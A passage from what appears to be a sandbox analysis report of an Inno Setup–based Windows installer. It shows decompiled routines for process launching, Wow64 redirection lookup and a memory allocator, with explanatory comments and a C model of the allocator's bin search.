                                                                                    				if( *0x4c1d94 != 0) {
                                                                                    					_t47 =  *0x4c1d94; // 0x0
                                                                                    					_t40 = RemoveDirectoryW(E004084EC(_t47)); // executed
                                                                                    				}
                                                                                    				if( *0x4ba450 != 0) {
                                                                                    					_t46 =  *0x4ba450; // 0x9025c
                                                                                    					_t40 = DestroyWindow(_t46); // executed
                                                                                    				}
                                                                                    				if( *0x4c1d78 != 0) {
                                                                                    					_t41 =  *0x4c1d78; // 0x0
                                                                                    					_t60 =  *0x4c1d7c; // 0x1
                                                                                    					_t69 =  *0x426bb0; // 0x426bb4
                                                                                    					E00408D08(_t41, _t60, _t69);
                                                                                    					_t43 =  *0x4c1d78; // 0x0
                                                                                    					E0040540C(_t43);
                                                                                    					 *0x4c1d78 = 0;
                                                                                    					return 0;
                                                                                    				}
                                                                                    				return _t40;
                                                                                    			}

                                                                                    APIs
                                                                                      • Part of subcall function 0040E450: CreateWindowExW.USER32 ref: 0040E48F
                                                                                    • SetWindowLongW.USER32 ref: 004B641E
                                                                                      • Part of subcall function 00422BC4: GetCommandLineW.KERNEL32(00000000,00422C06,?,?,00000000,?,004B647E,004B6680,?), ref: 00422BDA
                                                                                      • Part of subcall function 004AF728: CreateProcessW.KERNEL32 ref: 004AF798
                                                                                      • Part of subcall function 004AF728: CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004AF82C,00000000,004AF81C,00000000), ref: 004AF7AE
                                                                                      • Part of subcall function 004AF728: MsgWaitForMultipleObjects.USER32 ref: 004AF7C7
                                                                                      • Part of subcall function 004AF728: GetExitCodeProcess.KERNEL32 ref: 004AF7DB
                                                                                      • Part of subcall function 004AF728: CloseHandle.KERNEL32(?,?,004BA44C,00000001,?,00000000,000000FF,000004FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AF7E4
                                                                                    • RemoveDirectoryW.KERNEL32(00000000,004B6554), ref: 004B6500
                                                                                    • DestroyWindow.USER32(0009025C,004B6554), ref: 004B6514
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                    • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                    • API String ID: 3586484885-3001827809
                                                                                    • Opcode ID: 3c021837c984efc67f9ad3a794955b0d04b23bc85077f6812c73bb0a86195aee
                                                                                    • Instruction ID: 04c90e22d0408fd8de4b79ff2beaee59f7a3a861a1d73b16261182ae62401715
                                                                                    • Opcode Fuzzy Hash: 3c021837c984efc67f9ad3a794955b0d04b23bc85077f6812c73bb0a86195aee
                                                                                    • Instruction Fuzzy Hash: EC416B74A002009FE754EBA9EC85B9A37B4EB85308F11453BE0059B2B6CB7CA851CB5D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 61%
E004AF728(void* __eax, void* __ebx, DWORD* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
	char _v8;
	struct _STARTUPINFOW _v76;
	void* _v88;
	void* _v92;
	int _t23;
	intOrPtr _t49;
	DWORD* _t51;
	void* _t56;

	_v8 = 0;
	_t51 = __ecx;
	_t53 = __edx;
	_t41 = __eax;
	_push(_t56);
	_push(0x4af7ff);
	_push( *[fs:eax]);
	 *[fs:eax] = _t56 + 0xffffffa8;
	_push(0x4af81c);
	_push(__eax);
	_push(0x4af82c);
	_push(__edx);
	E004087C4( &_v8, __eax, 4, __ecx, __edx); // builds the command line string in _v8 from the four pieces pushed above
	E00405884( &_v76, 0x44); // zero the STARTUPINFOW (0x44 = sizeof(STARTUPINFOW))
	_v76.cb = 0x44;
	_t23 = CreateProcessW(0, E004084EC(_v8), 0, 0, 0, 0, 0, 0,  &_v76,  &_v92); // executed; lpApplicationName is NULL, the target comes from the command line only; PROCESS_INFORMATION lands at _v92 (hProcess) / _v88 (hThread)
	_t58 = _t23;
	if(_t23 == 0) {
		E004AF34C(0x83, _t41, 0, _t53, _t58); // error path (calls GetLastError, see APIs below)
	}
	CloseHandle(_v88); // thread handle is not needed
	do {
		E004AF6FC();
	} while (MsgWaitForMultipleObjects(1,  &_v92, 0, 0xffffffff, 0x4ff) == 1); // INFINITE, QS_ALLINPUT; return value 1 (WAIT_OBJECT_0 + 1) means a message arrived, so keep pumping until the process handle is signalled
	E004AF6FC();
	GetExitCodeProcess(_v92, _t51); // executed; exit code is written through __ecx
	CloseHandle(_v92);
	_pop(_t49);
	 *[fs:eax] = _t49;
	_push(0x4af806);
	return E00407A20( &_v8);
}

APIs
• CreateProcessW.KERNEL32 ref: 004AF798
• CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004AF82C,00000000,004AF81C,00000000), ref: 004AF7AE
• MsgWaitForMultipleObjects.USER32 ref: 004AF7C7
• GetExitCodeProcess.KERNEL32 ref: 004AF7DB
• CloseHandle.KERNEL32(?,?,004BA44C,00000001,?,00000000,000000FF,000004FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AF7E4
  • Part of subcall function 004AF34C: GetLastError.KERNEL32(00000000,004AF3F5,?,?,00000000), ref: 004AF36F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
Similarity
• API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
• String ID: D
• API String ID: 3356880605-2746444292
• Opcode ID: ad1163668f60b09aa263e635df1463f1e4b37e8a5aa9c4cbf2e159c77cef0046
• Instruction ID: 88989adc3f1fa39a5a5eb6990527994e2deb527bcdcae90bffb7d35c0d41af56
• Opcode Fuzzy Hash: ad1163668f60b09aa263e635df1463f1e4b37e8a5aa9c4cbf2e159c77cef0046
• Instruction Fuzzy Hash: C01163716041096EEB00FBE68C42F9F77ACDF56714F50053AB604E72C5DA789905866D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 60%
E004B5A90(void* __ebx, void* __ecx, void* __edx, void* __esi) {
	char _v8;
	char _v12;
	char _v16;
	char _t16;
	intOrPtr _t32;
	intOrPtr _t41;

	_t27 = __ebx;
	_push(0);
	_push(0);
	_push(0);
	_push(_t41);
	_push(0x4b5b5a);
	_push( *[fs:eax]);
	 *[fs:eax] = _t41;
	 *0x4c1124 =  *0x4c1124 - 1; // decrement-and-test guard: the body runs once, when the counter goes negative
	if( *0x4c1124 < 0) {
		// Both exports are resolved by name through E0040E1A8 (GetProcAddress, see APIs below) rather than
		// imported, so the binary still loads on a kernel32 that lacks them. A 32-bit process on 64-bit
		// Windows needs this pair to reach the native System32 instead of the SysWOW64 mirror.
		 *0x4c1128 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64DisableWow64FsRedirection");
		 *0x4c112c = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64RevertWow64FsRedirection");
		if( *0x4c1128 == 0 ||  *0x4c112c == 0) {
			_t16 = 0;
		} else {
			_t16 = 1;
		}
		 *0x4c1130 = _t16; // 1 = both functions available, 0 = redirection control unavailable
		E00422D44( &_v12);
		E00422660(_v12,  &_v8);
		E004086E4( &_v8, L"shell32.dll"); // _v8 = <result of E00422D44/E00422660> + "shell32.dll"
		E00421230(_v8, _t27, 0x8000); // executed; loads shell32.dll by the full path built above
		E004232EC(0x4c783afb,  &_v16);
	}
	_pop(_t32);
	 *[fs:eax] = _t32;
	_push(0x4b5b61);
	return E00407A80( &_v16, 3);
}

APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004B5B5A,?,00000000,00000000,00000000), ref: 004B5ABE
  • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
• GetModuleHandleW.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004B5B5A,?,00000000,00000000,00000000), ref: 004B5AD8
  • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00000000), ref: 0040E20B
Strings
Memory Dump Source
• Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
Similarity
• API ID: AddressHandleModuleProc
• String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
• API String ID: 1646373207-2130885113
• Opcode ID: 149d4641e6716bccfc7038b8b83dc43c2c59674e16c2d4af6eff100d23c955b7
• Instruction ID: b56c6da1e02aeac4ac36a9fb763b3b3a2bfa4c382daca5c5ea2a5d16c2919690
• Opcode Fuzzy Hash: 149d4641e6716bccfc7038b8b83dc43c2c59674e16c2d4af6eff100d23c955b7
• Instruction Fuzzy Hash: DA11A730604704AFD744EB76DC02F9DB7B4E749704F64447BF500A6591CABC6A04CA3D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 68%
E00403EE8(signed int __eax) {
	signed int __ebx;
	signed int __edi;
	signed int __esi;
	void* _t96;
	void** _t99;
	signed int _t104;
	signed int _t109;
	signed int _t110;
	intOrPtr* _t114;
	void* _t116;
	void* _t121;
	signed int _t125;
	signed int _t129;
	signed int _t131;
	signed int _t132;
	signed int _t133;
	signed int _t134;
	signed int _t135;
	unsigned int _t141;
	signed int _t142;
	void* _t144;
	void* _t147;
	intOrPtr _t148;
	signed int _t150;
	long _t156;
	intOrPtr _t159;
	signed int _t162;

	_t95 = __eax;
	_t129 =  *0x4bb059; // 0x0
	if(__eax > 0xa2c) { // request too large for a small block
		__eflags = __eax - 0x40a2c;
		if(__eax > 0x40a2c) { // large block: gets its own VirtualAlloc region
			_pop(_t120);
			__eflags = __eax;
			if(__eax >= 0) { // requests >= 0x80000000 are refused
				_push(_t120);
				_t162 = __eax;
				_t2 = _t162 + 0x10010; // 0x10110
				_t156 = _t2 - 0x00000001 + 0x00000004 & 0xffff0000; // round (size + 16-byte header + 4-byte block header) up to 64 KiB
				_t96 = VirtualAlloc(0, _t156, 0x101000, 4); // executed; 0x101000 = MEM_COMMIT|MEM_RESERVE|MEM_TOP_DOWN, 4 = PAGE_READWRITE
				_t121 = _t96;
				if(_t121 != 0) {
					_t147 = _t121;
					 *((intOrPtr*)(_t147 + 8)) = _t162; // requested size
					 *(_t147 + 0xc) = _t156 | 0x00000004; // allocated size | large-block flag
					E00403C48();
					_t99 =  *0x4bdb80; // 0x4bdb7c
					 *_t147 = 0x4bdb7c; // link into the doubly linked list of large blocks anchored at 0x4bdb7c
					 *0x4bdb80 = _t121;
					 *(_t147 + 4) = _t99;
					 *_t99 = _t121;
					 *0x4bdb78 = 0;
					_t121 = _t121 + 0x10; // user pointer follows the 16-byte header
				}
				return _t121;
			} else {
				__eflags = 0;
				return 0;
			}
		} else {
			_t67 = _t95 + 0xd3; // 0x1d3
			_t125 = (_t67 & 0xffffff00) + 0x30; // medium block: round to 256-byte granularity plus 0x30; smallest result is 0xb30
			__eflags = _t129;
			if(__eflags != 0) { // lock only when the flag at 0x4bb059 (multithread) is set
				while(1) {
					asm("lock cmpxchg [0x4bbae8], ah"); // try to take the byte lock at 0x4bbae8 (0 -> 1)
					if(__eflags == 0) {
						goto L42;
					}
					asm("pause");
					__eflags =  *0x4bb989;
					if(__eflags != 0) {
						continue;
					} else {
						Sleep(0); // yield, retry, then back off 10 ms on contention
						asm("lock cmpxchg [0x4bbae8], ah");
						if(__eflags != 0) {
							Sleep(0xa);
							continue;
						}
					}
					goto L42;
				}
			}
			L42:
			_t68 = _t125 - 0xb30; // -2445
			_t141 = _t68;
			_t142 = _t141 >> 0xd; // bin group (32 bins per group)
			_t131 = _t141 >> 8; // bin number, 256-byte steps from 0xb30
			_t104 = 0xffffffff << _t131 &  *(0x4bbaf8 + _t142 * 4); // non-empty bins in this group at or above the wanted bin
			__eflags = 0xffffffff;
			if(0xffffffff == 0) { // tests the AND result above; the decompiler lost the flag dependency
				_t132 = _t142;
				__eflags = 0xfffffffe << _t132 &  *0x4bbaf4; // any non-empty higher group?
				if((0xfffffffe << _t132 &  *0x4bbaf4) == 0) {
					_t133 =  *0x4bbaf0; // 0x0
					_t134 = _t133 - _t125; // bytes left in the current sequential-feed area
					__eflags = _t134;
					if(_t134 < 0) {
						_t109 = E00403BCC(_t125); // not enough room: fall back to E00403BCC
					} else {
						_t110 =  *0x4bbaec; // 0x2160900
						_t109 = _t110 - _t125; // carve the block from the end of the feed area
						 *0x4bbaec = _t109;
						 *0x4bbaf0 = _t134;
						 *(_t109 - 4) = _t125 | 0x00000002; // block header at user_ptr - 4: size | medium-block flag
					}
					 *0x4bbae8 = 0; // release the lock
					return _t109;
				} else {
					asm("bsf edx, eax");
					asm("bsf ecx, eax");
					_t135 = _t132 | _t142 << 0x00000005; // first bin of the first non-empty higher group
					goto L50;
				}
			} else {
				asm("bsf eax, eax");
				_t135 = _t131 & 0xffffffe0 | _t104; // first non-empty bin in this group
                                                                                    							L50:
                                                                                    							_push(_t152);
                                                                                    							_push(_t145);
                                                                                    							_t148 = 0x4bbb78 + _t135 * 8;
                                                                                    							_t159 =  *((intOrPtr*)(_t148 + 4));
                                                                                    							_t114 =  *((intOrPtr*)(_t159 + 4));
                                                                                    							 *((intOrPtr*)(_t148 + 4)) = _t114;
                                                                                    							 *_t114 = _t148;
                                                                                    							__eflags = _t148 - _t114;
                                                                                    							if(_t148 == _t114) {
                                                                                    								asm("rol eax, cl");
                                                                                    								_t80 = 0x4bbaf8 + _t142 * 4;
                                                                                    								 *_t80 =  *(0x4bbaf8 + _t142 * 4) & 0xfffffffe;
                                                                                    								__eflags =  *_t80;
                                                                                    								if( *_t80 == 0) {
                                                                                    									asm("btr [0x4bbaf4], edx");
                                                                                    								}
                                                                                    							}
                                                                                    							_t150 = 0xfffffff0 &  *(_t159 - 4); // size of the free block taken from the bin
                                                                                    							_t144 = _t150 - _t125; // remainder left after the split (decompiler had folded _t150 into 0xfffffff0 below)
                                                                                    							__eflags = _t144;
                                                                                    							if(_t144 == 0) {
                                                                                    								_t89 = _t159 - 4 + _t150; // header of the following block
                                                                                    								 *_t89 =  *_t89 & 0x000000f7;
                                                                                    								__eflags =  *_t89;
                                                                                    							} else {
                                                                                    								_t116 = _t125 + _t159;
                                                                                    								 *((intOrPtr*)(_t116 - 4)) = _t144 + 3;
                                                                                    								 *(_t144 + _t116 - 8) = _t144;
                                                                                    								__eflags = _t144 - 0xb30;
                                                                                    								if(_t144 >= 0xb30) {
                                                                                    									E00403B00(_t116, _t144 + 3, _t144);
                                                                                    								}
                                                                                    							}
                                                                                    							_t93 = _t125 + 2; // 0x1a5
                                                                                    							 *(_t159 - 4) = _t93;
                                                                                    							 *0x4bbae8 = 0;
                                                                                    							return _t159;
                                                                                    						}
                                                                                    					}
                                                                                    				} else {
                                                                                    					__eflags = __cl;
                                                                                    					_t6 = __edx + 0x4bb990; // 0xc8c8c8c8
                                                                                    					__eax =  *_t6 & 0x000000ff;
                                                                                    					__ebx = 0x4b7080 + ( *_t6 & 0x000000ff) * 8;
                                                                                    					if(__eflags != 0) {
                                                                                    						while(1) {
                                                                                    							__eax = 0x100;
                                                                                    							asm("lock cmpxchg [ebx], ah");
                                                                                    							if(__eflags == 0) {
                                                                                    								goto L5;
                                                                                    							}
                                                                                    							__ebx = __ebx + 0x20;
                                                                                    							__eflags = __ebx;
                                                                                    							__eax = 0x100;
                                                                                    							asm("lock cmpxchg [ebx], ah");
                                                                                    							if(__ebx != 0) {
                                                                                    								__ebx = __ebx + 0x20;
                                                                                    								__eflags = __ebx;
                                                                                    								__eax = 0x100;
                                                                                    								asm("lock cmpxchg [ebx], ah");
                                                                                    								if(__ebx != 0) {
                                                                                    									__ebx = __ebx - 0x40;
                                                                                    									asm("pause");
                                                                                    									__eflags =  *0x4bb989;
                                                                                    									if(__eflags != 0) {
                                                                                    										continue;
                                                                                    									} else {
                                                                                    										Sleep(0);
                                                                                    										__eax = 0x100;
                                                                                    										asm("lock cmpxchg [ebx], ah");
                                                                                    										if(__eflags != 0) {
                                                                                    											Sleep(0xa);
                                                                                    											continue;
                                                                                    										}
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    							goto L5;
                                                                                    						}
                                                                                    					}
                                                                                    					L5:
                                                                                    					__edx =  *(__ebx + 8);
                                                                                    					__eax =  *(__edx + 0x10);
                                                                                    					__ecx = 0xfffffff8;
                                                                                    					__eflags = __edx - __ebx;
                                                                                    					if(__edx == __ebx) {
                                                                                    						__edx =  *(__ebx + 0x18);
                                                                                    						__ecx =  *(__ebx + 2) & 0x0000ffff;
                                                                                    						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
                                                                                    						__eflags = __eax -  *(__ebx + 0x14);
                                                                                    						if(__eax >  *(__ebx + 0x14)) {
                                                                                    							_push(__esi);
                                                                                    							_push(__edi);
                                                                                    							__eflags =  *0x4bb059;
                                                                                    							if(__eflags != 0) {
                                                                                    								while(1) {
                                                                                    									__eax = 0x100;
                                                                                    									asm("lock cmpxchg [0x4bbae8], ah");
                                                                                    									if(__eflags == 0) {
                                                                                    										goto L22;
                                                                                    									}
                                                                                    									asm("pause");
                                                                                    									__eflags =  *0x4bb989;
                                                                                    									if(__eflags != 0) {
                                                                                    										continue;
                                                                                    									} else {
                                                                                    										Sleep(0);
                                                                                    										__eax = 0x100;
                                                                                    										asm("lock cmpxchg [0x4bbae8], ah");
                                                                                    										if(__eflags != 0) {
                                                                                    											Sleep(0xa);
                                                                                    											continue;
                                                                                    										}
                                                                                    									}
                                                                                    									goto L22;
                                                                                    								}
                                                                                    							}
                                                                                    							L22:
                                                                                    							 *(__ebx + 1) =  *(__ebx + 1) &  *0x4bbaf4;
                                                                                    							__eflags =  *(__ebx + 1) &  *0x4bbaf4;
                                                                                    							if(( *(__ebx + 1) &  *0x4bbaf4) == 0) {
                                                                                    								__ecx =  *(__ebx + 4) & 0x0000ffff;
                                                                                    								__edi =  *0x4bbaf0; // 0x0
                                                                                    								__eflags = __edi - ( *(__ebx + 4) & 0x0000ffff);
                                                                                    								if(__edi < ( *(__ebx + 4) & 0x0000ffff)) {
                                                                                    									__eax =  *(__ebx + 6) & 0x0000ffff;
                                                                                    									__edi = __eax;
                                                                                    									__eax = E00403BCC(__eax);
                                                                                    									__esi = __eax;
                                                                                    									__eflags = __eax;
                                                                                    									if(__eax != 0) {
                                                                                    										goto L35;
                                                                                    									} else {
                                                                                    										 *0x4bbae8 = __al;
                                                                                    										 *__ebx = __al;
                                                                                    										_pop(__edi);
                                                                                    										_pop(__esi);
                                                                                    										_pop(__ebx);
                                                                                    										return __eax;
                                                                                    									}
                                                                                    								} else {
                                                                                    									__esi =  *0x4bbaec; // 0x2160900
                                                                                    									__ecx =  *(__ebx + 6) & 0x0000ffff;
                                                                                    									__edx = __ecx + 0xb30;
                                                                                    									__eflags = __edi - __edx;
                                                                                    									if(__edi >= __edx) {
                                                                                    										__edi = __ecx;
                                                                                    									}
                                                                                    									__esi = __esi - __edi;
                                                                                    									 *0x4bbaf0 =  *0x4bbaf0 - __edi;
                                                                                    									 *0x4bbaec = __esi;
                                                                                    									goto L35;
                                                                                    								}
                                                                                    							} else {
                                                                                    								asm("bsf eax, esi");
                                                                                    								__esi = __eax * 8;
                                                                                    								__ecx =  *(0x4bbaf8 + __eax * 4);
                                                                                    								asm("bsf ecx, ecx");
                                                                                    								__ecx =  *(0x4bbaf8 + __eax * 4) + __eax * 8 * 4;
                                                                                    								__edi = 0x4bbb78 + ( *(0x4bbaf8 + __eax * 4) + __eax * 8 * 4) * 8;
                                                                                    								__esi =  *(__edi + 4);
                                                                                    								__edx =  *(__esi + 4);
                                                                                    								 *(__edi + 4) = __edx;
                                                                                    								 *__edx = __edi;
                                                                                    								__eflags = __edi - __edx;
                                                                                    								if(__edi == __edx) {
                                                                                    									__edx = 0xfffffffe;
                                                                                    									asm("rol edx, cl");
                                                                                    									_t38 = 0x4bbaf8 + __eax * 4;
                                                                                    									 *_t38 =  *(0x4bbaf8 + __eax * 4) & 0xfffffffe;
                                                                                    									__eflags =  *_t38;
                                                                                    									if( *_t38 == 0) {
                                                                                    										asm("btr [0x4bbaf4], eax");
                                                                                    									}
                                                                                    								}
                                                                                    								__edi = 0xfffffff0;
                                                                                    								__edi = 0xfffffff0 &  *(__esi - 4);
                                                                                    								__eflags = __edi - 0x10a60; // the compare is on the block size in edi; the decompiler folded it into 0xfffffff0
                                                                                    								if(__edi < 0x10a60) {
                                                                                    									_t52 = __esi - 4 + __edi; // header of the following block
                                                                                    									 *_t52 =  *_t52 & 0x000000f7;
                                                                                    									__eflags =  *_t52;
                                                                                    								} else {
                                                                                    									__edx = __edi;
                                                                                    									__edi =  *(__ebx + 6) & 0x0000ffff;
                                                                                    									__edx = __edx - __edi;
                                                                                    									__eax = __edi + __esi;
                                                                                    									__ecx = __edx + 3;
                                                                                    									 *(__eax - 4) = __ecx;
                                                                                    									 *(__edx + __eax - 8) = __edx;
                                                                                    									__eax = E00403B00(__eax, __ecx, __edx);
                                                                                    								}
                                                                                    								L35:
                                                                                    								_t56 = __edi + 6; // 0x6
                                                                                    								__ecx = _t56;
                                                                                    								 *(__esi - 4) = _t56;
                                                                                    								__eax = 0;
                                                                                    								 *0x4bbae8 = __al;
                                                                                    								 *__esi = __ebx;
                                                                                    								 *((intOrPtr*)(__esi + 0x10)) = 0;
                                                                                    								 *((intOrPtr*)(__esi + 0x14)) = 1;
                                                                                    								 *(__ebx + 0x18) = __esi;
                                                                                    								_t61 = __esi + 0x20; // 0x2160920
                                                                                    								__eax = _t61;
                                                                                    								__ecx =  *(__ebx + 2) & 0x0000ffff;
                                                                                    								__edx = __ecx + __eax;
                                                                                    								 *(__ebx + 0x10) = __ecx + __eax;
                                                                                    								__edi = __edi + __esi;
                                                                                    								__edi = __edi - __ecx;
                                                                                    								__eflags = __edi;
                                                                                    								 *(__ebx + 0x14) = __edi;
                                                                                    								 *__ebx = 0;
                                                                                    								 *(__eax - 4) = __esi;
                                                                                    								_pop(__edi);
                                                                                    								_pop(__esi);
                                                                                    								_pop(__ebx);
                                                                                    								return __eax;
                                                                                    							}
                                                                                    						} else {
                                                                                    							_t19 = __edx + 0x14;
                                                                                    							 *_t19 =  *(__edx + 0x14) + 1;
                                                                                    							__eflags =  *_t19;
                                                                                    							 *(__ebx + 0x10) = __ecx;
                                                                                    							 *__ebx = 0;
                                                                                    							 *(__eax - 4) = __edx;
                                                                                    							_pop(__ebx);
                                                                                    							return __eax;
                                                                                    						}
                                                                                    					} else {
                                                                                    						 *(__edx + 0x14) =  *(__edx + 0x14) + 1;
                                                                                    						__ecx = 0xfffffff8 &  *(__eax - 4);
                                                                                    						__eflags = __ecx; // the jnz tests the next-free-block offset in ecx, not the mask constant
                                                                                    						 *(__edx + 0x10) = __ecx;
                                                                                    						 *(__eax - 4) = __edx;
                                                                                    						if(__ecx == 0) {
                                                                                    							__ecx =  *(__edx + 8);
                                                                                    							 *(__ecx + 0xc) = __ebx;
                                                                                    							 *(__ebx + 8) = __ecx;
                                                                                    							 *__ebx = 0;
                                                                                    							_pop(__ebx);
                                                                                    							return __eax;
                                                                                    						} else {
                                                                                    							 *__ebx = 0;
                                                                                    							_pop(__ebx);
                                                                                    							return __eax;
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    			}
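The search between labels L42 and L50 in the routine above (shift by 8 and by 13, `shl` of -1 and of -2 by `cl`, two `bsf` instructions, then the `rol`/`btr` clean-up at 0x4bbaf8 and 0x4bbaf4) is a two-level bitmap lookup over 256-byte size bins: one bit per non-empty bin, one bit per group of 32 bins. The following is an added example in C, not code from the sample or from this report, that reproduces that lookup with the constants visible in the listing (0xb30 minimum block size, `>> 8` for the bin, `>> 13` for the group). The table of 32 groups and all function and variable names are assumptions made for the example.

```c
#include <stdint.h>
#include <stdio.h>

/* Added example, not code from the sample: a C model of the two-level bitmap
 * bin lookup in the decompiled routine (labels L42..L50). Constants are taken
 * from the listing: 0xb30 minimum block size, 256-byte bins (size >> 8),
 * 32 bins per group (size >> 13). A table of 32 groups is an assumption. */

#define MIN_BLOCK_SIZE   0xb30u
#define BIN_SHIFT        8
#define GROUP_SHIFT      13
#define NUM_GROUPS       32u

static uint32_t group_bitmap;             /* one bit per group with a non-empty bin ([0x4bbaf4] in the listing) */
static uint32_t bin_bitmaps[NUM_GROUPS];  /* one bit per non-empty bin ([0x4bbaf8 + group*4] in the listing)    */

static void bins_reset(void)
{
    group_bitmap = 0;
    for (unsigned g = 0; g < NUM_GROUPS; g++)
        bin_bitmaps[g] = 0;
}

/* A free block was put into `bin`: set the bin bit and the group bit. */
static void bin_set_nonempty(unsigned bin)
{
    unsigned g = bin >> 5;
    bin_bitmaps[g] |= 1u << (bin & 31);
    group_bitmap   |= 1u << g;
}

/* The last free block left `bin`. The listing does this with rol edx,cl on
 * 0xfffffffe (which yields ~(1 << cl)) and then btr on the group bitmap once
 * the bin word reaches zero. */
static void bin_set_empty(unsigned bin)
{
    unsigned g = bin >> 5;
    bin_bitmaps[g] &= ~(1u << (bin & 31));
    if (bin_bitmaps[g] == 0)
        group_bitmap &= ~(1u << g);
}

static unsigned size_to_bin(uint32_t size)
{
    return (size - MIN_BLOCK_SIZE) >> BIN_SHIFT;
}

/* Lowest non-empty bin holding blocks of at least `size` bytes, or -1 when no
 * binned block fits (the listing then falls back to its sequential-feed area or
 * to E00403BCC). Sizes below the minimum or beyond the binned range give -1. */
static int find_bin_for_size(uint32_t size)
{
    if (size < MIN_BLOCK_SIZE)
        return -1;
    uint32_t off   = size - MIN_BLOCK_SIZE;
    unsigned group = off >> GROUP_SHIFT;
    unsigned bin   = off >> BIN_SHIFT;
    if (group >= NUM_GROUPS)
        return -1;

    /* mov eax,-1 ; shl eax,cl ; and eax,[bin_bitmaps+group*4]: bins >= bin in the same group.
     * shl masks the count to 5 bits, hence (bin & 31). */
    uint32_t same_group = (0xffffffffu << (bin & 31)) & bin_bitmaps[group];
    if (same_group)
        return (int)((bin & ~31u) | (unsigned)__builtin_ctz(same_group));   /* bsf eax,eax */

    /* mov eax,-2 ; shl eax,cl ; and eax,[group_bitmap]: strictly higher groups only. */
    uint32_t higher = (0xfffffffeu << group) & group_bitmap;
    if (!higher)
        return -1;
    unsigned g2 = (unsigned)__builtin_ctz(higher);            /* bsf edx,eax */
    unsigned b2 = (unsigned)__builtin_ctz(bin_bitmaps[g2]);   /* bsf ecx,eax */
    return (int)((g2 << 5) | b2);
}

int main(void)
{
    bins_reset();
    bin_set_nonempty(5);
    bin_set_nonempty(40);
    printf("request for bin 3 -> bin %d\n", find_bin_for_size(MIN_BLOCK_SIZE + 3 * 0x100));
    printf("request for bin 6 -> bin %d\n", find_bin_for_size(MIN_BLOCK_SIZE + 6 * 0x100));
    return 0;
}
```

The two-step shape is what makes the listing hard to read: the first mask only looks at bins at or above the requested one inside the requested group, and the second mask deliberately skips the current group (`-2 << group`) because it was already searched.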

                                                                                    [Control-flow graph residue: only basic-block addresses survived extraction (range 0x00403c94 to 0x0040426b, with 0x00000000 null entries); the instruction text is not present on the page]

                                                                                    APIs
                                                                                    • Sleep.KERNEL32(00000000,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403F9F
                                                                                    • Sleep.KERNEL32(0000000A,00000000,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FB5
                                                                                    • Sleep.KERNEL32(00000000,00000000,?,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FE3
                                                                                    • Sleep.KERNEL32(0000000A,00000000,00000000,?,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FF9
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
